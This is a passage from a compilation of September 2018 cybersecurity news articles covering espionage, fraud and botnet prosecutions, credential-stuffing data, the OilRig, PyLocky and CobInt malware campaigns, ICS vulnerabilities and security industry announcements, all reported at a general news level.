At the time, Spiez was analysing data related to poison gas attacks in Syria, as well as the March 4 attack using the nerve agent Novichok on Russian double agent Sergei Skripal and his daughter in Salisbury, they reported.

The laboratory does analytical work for the Hague-based Organisation for the Prohibition of Chemical Weapons (OPCW), the global chemical arms watchdog.

Exact details of the alleged agents' arrest are unknown.

But on March 26, Dutch Prime Minister Mark Rutte announced that his cabinet had decided to expel "two Russian intelligence workers from the Russian embassy" as a result of the Skripal attack, without giving further details.

Swiss intelligence officials Friday confirmed they were aware of the incident.

- 'In the crosshairs' -

"The case of the Russian spies discovered in The Hague and then expelled from The Hague is known to Swiss authorities," Isabelle Graber, spokeswoman for the Swiss intelligence services (SRC), told AFP.

The Swiss spy agency "actively participated in this operation in collaboration with its Dutch and British partners in prevention of illegal actions against critical Swiss infrastructure," she said.

The Spiez laboratory confirmed it had been targeted by hackers earlier this year, but had no comment on the specific claims about the Russians arrested by the Netherlands.

"We had indications in the past few months that we were in the crosshairs of some hacking attempts and took precautions and weren't compromised," Andreas Bucher, a spokesman for the Spiez lab, told AFP.

Bucher cited a case in June where hackers took documents from the lab's website and "distributed a very malicious malware virus" to affiliated agencies.

The same malware was used to attack the Winter Olympics in South Korea, he added.

Dutch intelligence services declined to comment when contacted by AFP, saying "we don't give information about operations".

Russia's SVR foreign intelligence service information head Sergei Ivanov also told the RIA Novosti state news agency that "the SVR does not comment on this information".

However, in April Lavrov accused the OPCW of "manipulating" the results of the Skripal probe by omitting findings from the Spiez laboratory.

According to the results from Spiez, the samples sent by the OPCW contained a nerve agent called "BZ" which was manufactured by the West, Lavrov said, citing "confidential information".

Commenting on the latest reports, Lavrov said "I cannot believe that such an event involving three European countries escaped the attention of the media," seemingly inferring that it did not happen.

Two men who were accused by Britain of being GRU agents involved in the murder attempt on Skripal insisted in an interview that they were merely tourists who had come to visit Salisbury cathedral.

But the two men in the interview, named by British security services as Alexander Petrov and Ruslan Boshirov, "were not the two agents intercepted" by the Netherlands, the papers said.


Nigerian Fraudster Who Stole Millions Heads to U.S. Prison
15.9.2018 securityweek Crime

A Nigerian man was sentenced in Manhattan federal court to 60 months in prison for his role in fraudulent business email compromise (BEC) scams, the United States Department of Justice announced this week.

The man, Onyekachi Emmanuel Opara, 30, of Lagos, Nigeria, was charged for defrauding thousands of victims of more than $25 million. He pleaded guilty to conspiracy to commit wire fraud and wire fraud in April.

In addition to the prison term, Opara was sentenced to two years of supervised release and was ordered to pay $2.5 million in restitution. His co-defendant, David Chukwuneke Adindu (“Adindu”), was sentenced in December 2017 to 41 months in prison and ordered to pay $1.4 million in restitution.

Between 2014 and 2016, Opara and Adindu engaged in multiple BEC scams that targeted victims worldwide, including the United States, the United Kingdom, Australia, Switzerland, Sweden, New Zealand, and Singapore.

As part of the scheme, Opara sent fake emails to employees of the victim companies, asking for funds to be transferred to specified bank accounts. The emails claimed to arrive from supervisors at those companies or from third party vendors the companies did business with.

“In reality, the emails were either sent from email accounts with domain names very similar to those of the companies and vendors, or the metadata for the emails was modified to make it appear as if the emails had been sent from legitimate email addresses,” the DoJ explains.

The fraudsters withdrew the funds immediately after the victims transferred them, or moved them to other bank accounts controlled by scheme participants. The fraudsters attempted to steal more than $25 million from their intended victims.

Opara also created accounts on dating websites and engaged in online romantic relationships with individuals in the United States by posing as a young attractive woman. Using this fake identity, he instructed individuals in the U.S. to send money overseas and/or to receive money fraudulently acquired through the BEC scams, and forward the proceeds to others.

One of the individuals who fell to this romantic relationship scheme sent over $600,000 of their own money to bank accounts controlled by scheme participants.

“Opara also attempted to recruit at least 14 other individuals via dating websites to receive funds from BEC scams into their bank accounts and then transfer the proceeds to overseas bank accounts,” the DoJ reveals.

The fraudster was arrested in December 2016, in Johannesburg, South Africa, and was extradited to the U.S. in January 2018.


Greek Supreme Court Approves Russian Request for Bitcoin Suspect
14.9.2018 securityweek BigBrothers

Greece's Supreme Court on Friday said a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency should be extradited to Russia, a court source said.

Alexander Vinnik, who headed bitcoin exchange BTC-e, has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki.

The final decision is up to the Greek justice minister.

Vinnik has said he would accept extradition to Russia, where he is wanted on fraud charges totalling 9,500 euros ($11,000).

The United States and France are also seeking his extradition to face far more extensive fraud charges than in Russia.

A US court indicted Vinnik last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

The Greek Supreme Court in December had said Vinnik should be extradited to the US.

The French warrant says Vinnik had defrauded over 100 people in six French cities between 2016 and 2018.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.


Forcepoint Launches Critical Infrastructure Business Unit
14.9.2018 securityweek ICS

Raytheon-owned cybersecurity solutions provider Forcepoint on Thursday announced the launch of a new business unit focusing on critical infrastructure.

The new unit will be led by David Hatchell, who has been named vice president of Critical Infrastructure. Hatchell, who previously led critical infrastructure units at Belden and Intel/McAfee, will report to Sean Berg, senior vice president and general manager for Forcepoint's Global Governments and Critical Infrastructure business.

Forcepoint launches ICS/critical infrastructure offering

The initial focus is on securing the industrial control systems (ICS) used by organizations in the energy, oil and gas, critical manufacturing and other critical infrastructure sectors.

Specifically, Forcepoint will deliver integrated behavior-based security products adapted for industrial environments, particularly solutions designed to provide more visibility into the potential threats facing ICS.

The company promises to provide solutions for secure segmentation where remote access is required, and a baseline for monitoring industrial environments for threats. The solutions are advertised as being in compliance with standards such as ISA/IEC 62443, NEI-08-09, and NERC-CIP.

ICS Cyber Security Conference

Some of these capabilities will be powered by Forcepoint NGFW, a product designed to detect exploitation attempts, block malware, and defeat evasion techniques across physical, virtual and cloud systems. Forcepoint NGFW can quickly scan encrypted traffic while providing granular privacy controls, the company said.

Another product offered to critical infrastructure organizations is Forcepoint Data Guard, which validates data transfers between OT and IT networks to ensure that only commands and data sets required for operations are allowed.

“Leveraging defense-grade approaches which are used by top government agencies, customers can deploy a variety of solutions for highly sensitive areas like nuclear and power generation, or meet simple DMZ and remote access requirements,” Hatchell wrote in a blog post. “Furthermore, the Forcepoint pedigree of understanding insider threats, or how actors behave once inside an environment to compromise system operations, gives us a unique viewpoint to address ICS challenges where they are most vulnerable—the human point of interaction with systems and data.”


N. Korea Calls Sony, Wannacry Hack Charges Smear Campaign
14.9.2018 securityweek BigBrothers

PYONGYANG, North Korea (AP) — North Korea strongly denied claims by the United States that a computer programmer working for the North Korean government was involved in the hack of Sony Pictures Entertainment and the spread of the WannaCry ransomware.

In a statement Friday, a North Korean Foreign Ministry official said that the person named by U.S. is a "non-entity," and warned that the allegations, which he called a smear campaign, could harm talks between the two countries following the summit between President Donald Trump and North Korean leader Kim Jong Un.

U.S. federal prosecutors allege the programmer, identified as Park Jin Hyok, conspired to conduct a series of attacks that also stole $81 million from a bank in Bangladesh.

The U.S. believes he was working for a North Korean-sponsored hacking organization.

"The act of cybercrimes mentioned by the Justice Department has nothing to do with us," Han Yong Song, a researcher at the North Korean Foreign Ministry's Institute for American Studies, said in a statement carried by the Korean Central News Agency.

"The U.S. should seriously ponder over the negative consequences of circulating falsehoods and inciting antagonism against the DPRK that may affect the implementation of the joint statement adopted at the DPRK-U.S. summit," he said.

DPRK is short for North Korea's official name — the Democratic People's Republic of Korea.

In the statement, the North flatly denied it had anything to do with the 2104 Sony incident and WannaCry virus, calling the U.S. charges a "vicious slander and another smear campaign."

"The U.S. is totally mistaken if it seeks to gain anything from us through preposterous falsehoods and high-handedness," the statement said.

The U.S. government has previously said North Korea was responsible for the Sony hack, which led to the release of sensitive personal information about employees, including Social Security numbers, financial records, salary information, as well as embarrassing emails among top executives.

The FBI has also long suspected North Korea was behind WannaCry, which used malware to scramble data on hundreds of thousands of computers at hospitals, factories, government agencies, banks and other businesses across the globe.

Park is charged with two counts of conspiracy to commit computer and wire fraud.

The complaint said Park was on a team of programmers employed by what it said is a government front company called Chosun Expo that operated out of Dalian, China. The Treasury Department has added his name to their sanction list, prohibiting banks that do business in the U.S. from providing accounts to him or Chosun Expo.

It is the first time the Justice Department has brought criminal charges against a hacker said to be from North Korea.


One-Third of Data Breaches Led to People Losing Jobs: Kaspersky
14.9.2018 securityweek IT

Nearly one-third of data breaches suffered by companies around the world have resulted in someone losing their job, according to a study conducted earlier this year by Kaspersky Lab.

The cybersecurity firm has interviewed nearly 6,000 people across 29 countries for its annual Global Corporate IT Security Risks Survey. Respondents worked for companies of various sizes, including small businesses with less than 50 employees and major corporations with over 1,000 workers.

The study found that, globally, 31% of incidents led to employees being laid off. China was the country with the highest percentage of senior IT security staff being laid off as a result of a data breach. People holding a senior IT role lost their job in roughly one-third of cases, with similar percentages across the globe.

Kaspersky’s survey shows a significant difference in the chances of C-level executives and presidents losing their job over a data breach in various parts of the world. In North America, for instance, 32% of CEOs and other C-level managers were laid off following a data breach – this is the region where the C-suite is most likely to lose its job.

In other parts of the world, company leaders losing their job following a data breach is far less likely. In Russia, for example, the C-suite was only blamed in 7% of cases and in Japan the percentage is even lower at 5%.

Which employees are most likely to lose their job following a data breach in different parts of the world

Other non-financial consequences of a data breach – on a global level in enterprises – included additional security policies or requirements (38%), changing security vendors or service providers (35%), engaging with a breach notification services provider (33%), and changing authentication procedures for customers (29%).

North American businesses are the most affected by data breaches, with over 40% of respondents saying their organization had suffered at least one breach. Enterprises are more likely to get hit, compared to small and medium-sized businesses, and 68% of enterprises that suffered a data breach claimed to have suffered at least two incidents.

When it comes to compensations and fines after a breach, companies in China and the rest of the APAC region are most likely to pay compensation to clients or customers, but half of the companies from North America also reported doing the same. Companies in China, APAC and North America are also most likely to have problems with attracting new customers following a data breach, according to Kaspersky’s report.

“While a data breach is devastating to a business as a whole, it can also have a very personal impact on people’s lives — whether they are customers or failed employees – so this is a reminder that cybersecurity has real-life implications and is in fact everyone’s concern,” said Dmitry Aleshin, vice president of product marketing, Kaspersky Lab. “With data now traveling on devices and via the cloud, and with regulations like GDPR becoming enforceable, it’s vital that businesses pay even closer attention to their data protection strategies.”


Operator at kayo.moe found a 42M Record Credential Stuffing Data ready to use
14.9.2018 securityaffairs Incindent

Operator at kayo.moe found a 42M Record Credential Stuffing Data containing email addresses, plain text passwords, and partial credit card info.
A huge archive containing email addresses, plain text passwords, and partial credit card data has been found on a free anonymous hosting service, Kayo.moe.

The operator of the service shared the file with the popular expert Troy Hunt who operates the Have I Been Pwned data breach notification service asking him to check the source of the huge trove of data.

The data is not related to a data breach of kayo.moe, the platform was not impacted by any incident.

The database shared by Kayo includes over a total of 755 files totaling 1.8GB.

According to Hunt, the data in the archive were collected for credential stuffing attacks, typically hackers obtain data from multiple breaches then combine them into a single unified list.

The attackers were likely planning to run them automatically against multiple online services and compromise user accounts.

Troy Hunt

@troyhunt
Just blogged: The 42M Record http://kayo.moe Credential Stuffing Data https://troy.hn/2QqgDnS

11:46 AM - Sep 13, 2018

The 42M Record kayo.moe Credential Stuffing Data
This is going to be a brief blog post but it's a necessary one because I can't load the data I'm about to publish into Have I Been Pwned (HIBP) without providing more context than what I can in a...

troyhunt.com
32
22 people are talking about this
Twitter Ads info and privacy
Roughly 89% of the records in a sample set analyzed by Hunt were already in the HIBP archive, this means that the archive anyway contains a huge quantity of data that were not present.

“When I pulled the email addresses out of the file, I found almost 42M unique values. I took a sample set and found about 89% of them were already in HIBP which meant there was a significant amount of data I’ve never seen before. (Later, after loading the entire data set, that figure went up to 93%.),” Hunt wrote a blog post.

“There was no single pattern for the breaches they appeared in and the only noteworthy thing that stood out was a high hit rate against numeric email address aliases from Facebook also seen in the (most likely fabricated) Badoo incident. Inverting that number and pro-rata’ing to the entire data set, I’d never seen more than 4M of the addresses. So I loaded the data.”

Credential Stuffing Data

“The data also contained a variety of other files; some with logs, some with partial credit card data and some with Spotify details.” added Hunt. “This doesn’t indicate a Spotify breach, however, as I consistently see pastes implying a breach yet every time I’ve delved into it, it’s always come back to account takeover via password reused.”

To avoid being vulnerable to credential stuffing attacks the best defense is to use different credentials for each web service we use. Don’t reuse passwords!

Always use a two-factor authentication mechanism when implemented by the service we access to, and use strong password that can be generated by password manager applications.


Kelihos botmaster pleads guilty in U.S. District Court in Connecticut
14.9.2018 securityaffairs BotNet  Crime

The creator of the infamous Kelihos Botnet, Peter Yuryevich Levashov (38) pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.
Yuryevich Levashov (38), the botmaster of the dreaded Kelihos Botnet pleaded guilty this week to computer crime, fraud, conspiracy and identity theft charges.

In April 2017, the United States Department of Justice announced that Peter Yuryevich Levashov (36) (also known as Petr Levashov, Peter Severa, Petr Severa and Sergey Astakhov) was arrested in Barcelona for his involvement with the infamous Kelihos botnet. Levashov was extradited to the United States in February.

“Peter Yuryevich Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” 38, of St. Petersburg, Russia, pleaded guilty today in U.S. District Court in Hartford, Connecticut, to offenses stemming from his operation of the Kelihos botnet, which he used to facilitate malicious activities including harvesting login credentials, distributing bulk spam e-mails, and installing ransomware and other malicious software.” states the press release published by the DoJ.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.

kelihos botnet

According to a study conducted by CheckPoint Security, a malware landscape was characterized by some interesting changed in this first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.

Levashov has operated several botnets between since the late 1990s, for example, two other botnets tracked as Storm and Waledac borrow the code with Kelihos, both have been attributed to Levashov.

“For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams,” said Assistant Attorney General Benczkowski.

“Mr. Levashov used the Kelihos botnet to distribute thousands of spam e-mails, harvest login credentials, and install malicious software on computers around the world,” said U.S. Attorney Durham. “He also participated in online forums on which stolen identities, credit card information and cybercrime tools were traded and sold. For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users. “

The DoJ speculated Levashov sent spam urging recipients to buy shares as part of a “pump and dump” scam, among other naughtiness.

The Russian hacker was accused to have used the Kelihos botnet for spam campaign that advertised various criminal schemes, including pump-and-dump stock fraud.

The activity conducted by the Kelihos, Storm and Waledac botnets was very profitable, prosecutors believe they allowed crooks to earn hundreds of millions of dollars

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”

The sentence has been scheduled for September 6, 2019, likely because the man is now helping law enforcement agencies on investigations on other cybercrime operations.


Iran-Linked OilRig APT group targets high-ranking office in a Middle Eastern nation
14.9.2018 securityaffairs APT

Researchers from the Unit42 at Palo Alto Networks observed Iran-Linked OilRig APT group targeting high-ranking office in a Middle Eastern nation
The Iran-linked APT group OilRig continues to very active, it continues to improve the weapons in its arsenal.

The OilRig hacker group has been around since at least 2015, since then it targeted mainly organizations in the financial and government sectors, in the United States and Middle Eastern countries.

The OilRig APT group was recently observed using a new variant of the OopsIE Trojan that implements news evasion capabilities.

Now researchers from Palo Alto Networks’s Unit 42 have uncovered a new campaign attributed to the group that targeted members of an undisclosed government in the Middle East with an evolved variant of the BondUpdater trojan.

In mid-August, the state-sponsored hackers launched a highly targeted spear-phishing email to a high-ranking office in a Middle Eastern nation.

“In August 2018, Unit 42 observed OilRig targeting a government organization using spear-phishing emails to deliver an updated version of a Trojan known as BONDUPDATER. BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization.” reads the analysis published by Palo Alto Networks.

“The spear-phishing email had an attached Microsoft Word document that contained a macro responsible for installing a new variant of BONDUPDATER.”

The hackers used spear-phishing emails to deliver an updated version of the PowerShell-based BondUpdater Trojan. The BONDUPDATER Trojan supports implements common backdoor features such as uploading and downloading files, as well as executing commands on the infected system.

“The BondUpdater trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands,” continues the analysis published by Palo alto Networks.

“BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.”

The spear-phishing messages use a weaponized document with a macro responsible for downloading and executing a new variant of BondUpdater.

The macro runs the VBScript “AppPool.vbs” that creates a scheduled task that is execute every minute to ensure persistence to the BONDUPDATER Trojan.

The malware checks that only one instance of it is running at one time, it also locks files to determine how long the main PowerShell process has been executing.

If the main PowerShell process has been running for more than 10 minutes, the script will stop the process and delete the lock file to allow future execution of the PowerShell script.

“Future executions of the PowerShell script will fully execute as the lock file will no longer exist on the system. This suggests the threat actors may have experienced issues with this Trojan running for extended periods in the past, likely related to the communication loops that we will discuss later.” continues the experts.

OilRig APT

The BONDUPDATER Trojan also includes a new TXT-based C2 communication option, the malware includes two different variations of the DNS tunneling protocol, one using DNS A records, and one using DNS TXT records to transmit data from the command & control to the trojan.

“As expected, OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East. Sometimes developing new tools, OilRig also often uses what has worked in the past, including developing variants of previously used tools and malware. This reduces development time and capitalizes on previous versions of the tool and its success.” concluded Palo Alto Networks.

If you are interested in the indicators of Compromise (IoCs), give a look at the analysis published by Palo Alto Networks.


Report: Kansas Plans to Spend $4.6M on Election Security
14.9.2018 securityweek IT

Kansas plans to spend more than $4.6 million on election security grants over the next five years as it aims to tighten cyber security, modernize voting equipment, audit election results and safeguard voter rolls, according to a report released Thursday.

The U.S. Election Assistance Commission released the Kansas plan for its share of the $380 million allocated by Congress to strengthen voting systems amid ongoing threats from Russia and others. Nearly all the other states had released plans for their election security grants last month, but Kansas had gotten an extension to turn in its report.

Kansas has already received the more than $4.34 million that it sought from the federal government under the program, and the state kicked in about $219,000 in matching funds.

Kansas Secretary of State Kris Kobach told the federal commission in a letter that about half of its grant would be spent to increase and supplement its cyber security efforts at all levels of election administration. He said the state will supplement existing staff with security experts who are outside of state or local government.

Funds would also be made available to local governments to upgrade and supplement security and train county election personnel, Kobach wrote.

Nearly $1.07 million has been budgeted to ensure every voting machine in Kansas has a verifiable paper audit trail, according to the budget breakdown. The majority of counties in the state already have a paper-based system, Kobach said.

The state also slated more than $733,000 to improve security of the statewide voter registration system.

Beginning in January, Kansas will conduct post-election audits after every election. Its plan set aside $450,000 to implement the new auditing procedures at state and county levels.

The remaining funds would be used to create and train election officials to better communicate with the voting public and media as well as other government agencies.


Flaws Found in Fuji Electric Tool That Links Corporate PCs to ICS
14.9.2018 securityweek ICS

Several vulnerabilities rated “high severity” have been discovered by researchers in Fuji Electric V-Server. The vendor has released updates that should address the flaws.

The existence of the security holes, all of which could allow a remote attacker to execute arbitrary code, was made public this week when ICS-CERT published two advisories.

Fuji Electric V-Server is a tool that allows organizations to access programmable logic controllers (PLCs) located in the plant from PCs located on the corporate network. The two systems are linked over Ethernet via the Monitouch human-machine interfaces (HMI) that are used to monitor the PLCs. ICS-CERT says the product is used worldwide, mainly in the critical manufacturing sector.

Serious vulnerabilities found in Fuji Electric V-Server

According to ICS-CERT, Fuji Electric V-Server is affected by use-after-free, untrusted pointer dereference, heap-based buffer overflow, out-of-bounds write, integer underflow, out-of-bounds read, and stack-based buffer overflow vulnerabilities that may allow remote code execution, which could lead to a denial-of-service (DoS) condition or information disclosure.

A separate advisory from ICS-CERT describes a high severity buffer overflow affecting V-Server Lite. The flaw can be exploited for code execution – and again it can lead to a DoS condition or information leakage – using specially crafted project files.

All the vulnerabilities have been patched by Fuji Electric with the release of version 4.0.4.0.

The V-Server vulnerabilities were reported to the vendor via Trend Micro’s Zero Day Initiative (ZDI) by Steven Seeley of Source Incite. The flaw affecting the Lite version was identified by Ariele Caltabiano (aka kimiya) and also reported to Fuji Electric via ZDI.

ICS-CERT warned that public exploits are available for some of the vulnerabilities. This may refer to the fact that ZDI has published more than a dozen advisories describing security holes found by Seeley and Caltabiano in Fuji Electric V-Server. The ZDI advisories were published just as this article was being written – several hours after ICS-CERT released its own advisories – but they do not contain any technical information on the flaws.

According to the ZDI advisories, Seeley reported the vulnerabilities to the vendor in March 2018, while Caltabiano did so in June.

ZDI says the flaws “exist within the parsing of a VPR file” and they are caused by either the lack of validating the existence of an object prior to performing operations on that object, or the lack of proper validation for user-supplied data.

While the ICS-CERT advisories assign a “high severity” rating to the vulnerabilities, the ZDI advisories describe them as “medium severity” with a CVSS score of 6.8. The weakness found by Caltabiano has a CVSS score of 9.3 (critical) in the ZDI advisory.

Vulnerabilities affecting products that connect the corporate network to industrial control systems (ICS) can pose a serious threat since that is how many threat actors attempt to make their way onto sensitive systems.

A study conducted recently by Positive Technologies showed that in many organizations hackers can easily gain access to industrial environments from the corporate network.


Trend Micro, HITRUST Launch New Cyber Risk Management Firm Cysiv
14.9.2018 securityweek IT

Cybersecurity solutions provider Trend Micro and HITRUST, a non-profit organization that promotes the protection of sensitive data, have joined forces to launch a new company that offers cyber risk management services.

The new company, named Cysiv, will provide risk management services to select enterprises in the United States. Cysiv aims to address several challenges that make it more difficult for organizations to defend themselves against cyberattacks and prevent breaches, including the shortage of skills, alert fatigue, rising costs, and product complexity.Trend Micro and HITRUST launch Cysiv

Cysiv offers experts whose role is to provide in-house security teams a variety of services, including hybrid cloud security, network IPS, user protection, advanced threat detection, and deception technologies.

In support of its monitoring and management offerings, Cysiv also offers product deployment, digital forensics, and incident response services.

Customers will pay for Cysiv services on a monthly basis depending on the services they require.

Cysiv will leverage Trend Micro’s cybersecurity platform, security research, and threat intelligence. HITRUST will provide expertise in threat information sharing, and compliance and risk management. Trend Micro and HITRUST have been partners for several years.

“The AI-powered security operations and analytics platform that’s at the heart of this new service is part of our on-going efforts to enable the SOC with greater visibility, and to add more actionable intelligence and automation to enterprise security,” said Eva Chen, co-founder and CEO of Trend Micro. “We’re excited by its immediate value to Cysiv customers, and more broadly by its longer-term potential for Trend Micro customers and partners.”

“Insights from both our risk management and information sharing service, clearly demonstrate that organizations of all sizes are struggling to effectively implement and operate their cyber defenses in today’s escalating threat environment,” commented Daniel Nutkis, CEO of HITRUST. “This new venture leverages the tremendous experience we’ve gained in conducting assessments, in managing a threat sharing platform and ultimately helping customers manage their cyber risks.”


New Python-based Ransomware Poses as Locky
14.9.2018 securityweek
Ransomware

A ransomware family used in attacks in July and August was posing as the infamous Locky ransomware that was highly active in 2016, Trend Micro researchers have discovered.

Written in Python and dubbed PyLocky, the new malware is packaged with PyInstaller, a tool that turns Python applications into standalone executables.

What makes PyLocky stand out from the crowd compared to other Python malware is anti-machine learning capability. It also uses the open-source script-based Inno Setup Installer and can pose a real challenge to static analysis methods, the security researchers say.

Furthermore, PyLocky has seen a highly concentrated distribution, with several spam emails targeting European countries, particularly France. Initially low, the spam volume increased in time.

A spam run observed in early August targeted French businesses, leveraging social engineering in an attempt to lure potential victims into clicking a link that redirects them to a malicious URL to download a ZIP file containing PyLocky.

Once installed on a victim’s machine, the malware attempts to encrypt image, video, document, sound, program, game, database, and archive files, among others. Overall, it targets a list of over 150 file types for encryption.

The ransomware abuses Windows Management Instrumentation (WMI) to check the properties of the affected system. It also features anti-sandbox capabilities, sleeping for 999,999 seconds (around 11.5 days) if the affected system has a total visible memory size of less than 4GB.

The ransomware’s encryption routines are implemented using the PyCrypto library and leverage the 3DES (Triple DES) cipher. PyLocky iterates through each logical drive, generates a list of files, and then overwrites targeted files with an encrypted version.

After completing the encryption process, PyLocky drops a ransom note and also establishes communication with its command and control (C&C) server. The malware’s ransom notes are in English, French, Korean, and Italian, suggesting that its operators are aiming at broader campaigns.

“PyLocky’s evasion techniques and abuse of legitimate tools typically reserved to administrators further exemplify the significance of defence in depth. For instance, machine learning is a valuable cybersecurity tool in detecting unique malware, but it is not a silver bullet. With today’s threats, there are different vectors at the attackers’ disposal, which makes a multi-layered approach to security important,” Trend Micro concludes.


Multi-Stage Malware Heavily Used in Recent Cobalt Attacks
14.9.2018 securityweek Attack 
Virus

The Russia-based Cobalt hacking group has made heavy use of the CobInt malware in recently observed campaigns, Proofpoint’s security researchers warn.

The Cobalt Gang appeared to have stopped using the malware as a first-stage downloader earlier this year, but an August campaign targeting Russian and Romanian banks revealed that they are using it again.

Known for targeting financial institutions worldwide, the group has also launched cyberattacks against organizations in the government, telecom/Internet, service providers, manufacturing, entertainment, and healthcare industries.

Since July, the multi-stage CobInt malware has been a constant presence in the threat actor’s attacks, delivered via malicious Office documents built using the ThreadKit exploit builder.

The malicious documents are targeting recent vulnerabilities in Microsoft Office, namely CVE-2017-8570, CVE-2017-11882, and CVE-2018-0802. The malicious files either attempt to drop a stage 1 payload or link to the CobInt downloader directly.

Between August 2 and September 4, Proofpoint detected four Cobalt attacks attempting to drop CobInt. The most recent of the incidents leveraged an Office document with a relationship object to fetch an external VBscript exploiting CVE-2018-8174 for the payload’s execution.

Written in C, CobInt is a downloader malware that can be broken up into three stages: an initial downloader, the main component, and additional modules.

The first stage’s purpose is to download the main CobInt component. It features encrypted command and control (C&C) host and URI, hides its functionality through the use of Windows API function hashing, and downloads the next stage via HTTPS.

CobInt’s main component is downloaded in the form of a DLL that stage 1 also executes. The main component fetches and runs various modules from the C&C. The malware uses HTTPS to communicate with the server.

Proofpoint’s researchers discovered four commands that the C&C server can send to the malware: load/execute module; stop polling C&C; execute function set by module; and update C&C polling wait time.

Loaded as shellcode, the modules start executing at the indicated entry point. The malware was observed loading two modules from the C&C, one to send a screenshot to the server, and the other to send a list of running process names.

These, Proofpoint notes, are reconnaissance steps that the attackers are likely to follow with the deployment of additional modules to the compromised systems of interest.

“CobInt provides additional evidence that threat actors […] are increasingly looking to stealthy downloaders to initially infect systems and then only install additional malware on systems of interest. […] This appears to be the latest trend as threat actors look to increase their effectiveness and differentiate final payloads based on user profiles,” Proofpoint concludes.


Kelihos Botnet Author Pleads Guilty in U.S. Court
14.9.2018 securityweek BotNet

Peter Yuryevich Levashov, a 38-year-old Russian national accused of operating the notorious Kelihos botnet, pleaded guilty on Wednesday to computer crime, fraud, conspiracy and identity theft charges.

Levashov, aka “Petr Levashov,” “Peter Severa,” “Petr Severa” and “Sergey Astakhov,” is said to have operated several botnets between the late 1990s and April 2017, when he was arrested.

The Storm and Waledac botnets, which share source code with Kelihos, have also been attributed to Levashov. Levashov’s malware had infected hundreds of thousands of computers, allowing him and other cybercriminals who rented the botnets to send spam and steal valuable information from compromised devices. Authorities said the man also took part in operating various cybercrime forums.

The Kelihos, Storm and Waledac botnets reportedly generated hundreds of millions of dollars for cybercriminals. Data leaked in 2010 after hackers broke into the systems of a pharmacy spam program showed that Levashov had made nearly $600,000 from these types of activities over a 3-year period.

Spamhaus’ entry on Levashov in its Register of Known Spam Operations (ROKSO) describes the Russian as “one of the longest operating criminal spam-lords on the internet.”

Levashov was indicted in the United States on April 20, just days after his arrest in Spain and action taken by authorities to dismantle the Kelihos botnet. He was extradited to the United States in February.

Levashov on Wednesday pleaded guilty in U.S. District Court in Hartford, Connecticut, to one count of causing intentional damage to a protected computer, one count of conspiracy, one count of aggravated identity theft, and one count of wire fraud.

His sentencing has been scheduled for September 6, 2019, and he will remain in custody until then. It’s unclear why the judge scheduled sentencing for one year from now, but it could indicate that Levashov is working with law enforcement agencies on dismantling other cybercrime operations.

“For years, Mr. Levashov lived quite comfortably while his criminal behavior disrupted the lives of thousands of computer users,” said U.S. Attorney John H. Durham of the District of Connecticut. “Thanks to the collaborative work of the FBI and our partners in law enforcement, private industry and academia, a prolific cybercriminal has been neutralized, and has now admitted his guilt in a U.S. courtroom.”


Senators Concerned About State Department's Cybersecurity Failures
14.9.2018 securityweek BigBrothers

A group of United States senators this week sent a letter to Secretary of State Mike Pompeo requesting clarifications regarding the Department of State’s failure to meet federal cybersecurity standards.

The letter was signed by senators Ron Wyden, Cory Gardner, Edward J. Markey, Rand Paul, and Jeanne Shaheen.

The lawmakers cited a recent assessment by the General Service Administration (GSA), which revealed that the State Department had only deployed advanced access controls on 11 percent of the agency’s devices. The senators noted that all executive branch agencies are required by law, the Federal Cybersecurity Enhancement Act, to enable multi-factor authentication (MFA) on accounts with elevated privileges.

The officials also pointed out that a report last year from the Department of State’s Inspector General found that roughly one-third of diplomatic missions “failed to conduct even the most basic cyber threat management practices, like regular reviews and audits.” The same report noted that experts managed to exploit vulnerabilities in the agency’s email accounts, applications and operating systems during the tests they conducted.

“We are sure you will agree on the need to protect American diplomacy from cyber attacks, which is why we have such a hard time understanding why the Department of State has not followed the lead of many other agencies and complied with federal law requiring agency use of MFA,” the senators wrote.

The letter instructs the Department of State to provide information on the actions taken in response to the Office of Management and Budget (OMB) designating its cyber readiness as “high risk,” to clarify what actions it has taken to address the absence of MFA on high-privilege accounts, and to provide statistics for the past three years regarding the number of attacks launched against State Department systems located abroad.

“It is not surprising in that there is no stopping the ‘Bring Your Own Device’ train — not even our most sensitive federal agency can stop it. As a result, federal agencies are not immune from the cyber-security risks that the private sector has been grappling with for years — except when it comes to having to pay fines, defense costs, and large damage awards (not to mention losses from customer defections),” Todd Shollenbarger, COO of biometric technology company Veridium, said via email.

